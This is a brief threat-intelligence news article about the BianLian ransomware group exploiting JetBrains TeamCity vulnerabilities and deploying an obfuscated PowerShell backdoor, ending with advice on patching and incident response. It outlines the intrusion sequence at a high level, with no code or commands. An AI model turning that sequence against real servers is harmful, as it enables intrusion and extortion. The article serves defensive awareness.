The BianLian ransomware group, known for its focus on extortion, has been observed exploiting vulnerabilities in JetBrains TeamCity software to deploy malicious PowerShell backdoors. This finding highlights BianLian’s ability to adapt and adopt new techniques to infiltrate target networks.
GuidePoint Security researchers discovered a recent BianLian attack that began with exploiting a vulnerability (CVE-2024-27198 or CVE-2023-42793) in a TeamCity server. This initial breach allowed the attackers to create user accounts and execute malicious commands.
Following this initial foothold, the attackers used legitimate tools like WinPthy to execute commands and BITSAdmin to deploy a malicious PowerShell script (web.ps1) along with communication tools to connect with their command and control (C2) server.
PowerShell Backdoor Deployment
While BianLian traditionally uses custom Go-based backdoors, this instance involved a PowerShell backdoor. This backdoor, though obfuscated, was deconstructed by GuidePoint researchers. Analysis revealed functionalities similar to BianLian’s Go backdoor, including network connections, execution of commands, and asynchronous operations for stealth.
Attribution to BianLian
Researchers linked the PowerShell backdoor to BianLian by analyzing communication parameters and cross-referencing IP addresses with known BianLian infrastructure. Additionally, Microsoft’s AV signature Win64/BianDoor.D further solidified this attribution.
Importance of Proactive Security
This incident underscores the importance of prioritizing security practices like patching vulnerabilities, having a robust incident response plan, and incorporating threat intelligence into penetration testing. Implementing a proactive security posture along with effective response capabilities is crucial to defend against evolving tactics used by BianLian and other cyber adversaries.